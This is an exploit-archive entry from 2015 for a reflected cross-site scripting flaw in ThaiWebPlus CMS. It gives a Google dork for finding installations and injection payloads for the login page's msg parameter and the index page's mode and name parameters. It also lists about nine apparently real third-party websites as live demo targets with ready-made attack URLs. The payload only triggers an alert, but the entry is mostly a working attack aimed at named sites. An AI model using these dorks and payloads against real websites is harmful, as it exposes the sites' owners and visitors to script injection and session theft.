ThaiWebPlus CMS Cross Site Scripting Vulnerability

2015-12-11T00:00:00
ID 1337DAY-ID-24704
Type zdt
Reporter Mojtaba MobhaM
Modified 2015-12-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : ThaiWebPlus CMS Cross Site Scripting Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://thaiwebplus.com
# Google Dork : Powered by ThaiWebPlus inurl:id_run=
# Date : 2015/12/12
# Version : 1.0
#
######################
# 1-1:Admin Page msg= Paramter
# 
# Demo :
#
#http://www.popman-popcorn.com/_adminP/login.php?msg=password%20incorrect%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.tourpakse.com/_adminP/login.php?msg=password%20incorrect%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.pptraining.in.th/_adminP/login.php?msg=password%20incorrect%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
# 1-2:Vulnerable Paramter mode= And name=
#
# Poc: 
# url: /index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode='><img onerror=alert(1) src="asd">&name=
# http://target/url
#
# Demo : 
#
#http://www.88part.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.laostai.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.tourpakse.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.chokdeepremium.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.thairctoy.com/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#http://www.pptraining.in.th/index.php?Content=product&CurrentPage=2&id_group=&id_run=&mode=%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&name=
#
#
######################
# Discovered by :
# Mojtaba MobhaM ([email protected])
# T3NZOG4N ([email protected])
# Home : http://www.persian-team.ir/
######################

#  0day.today [2018-03-12]  #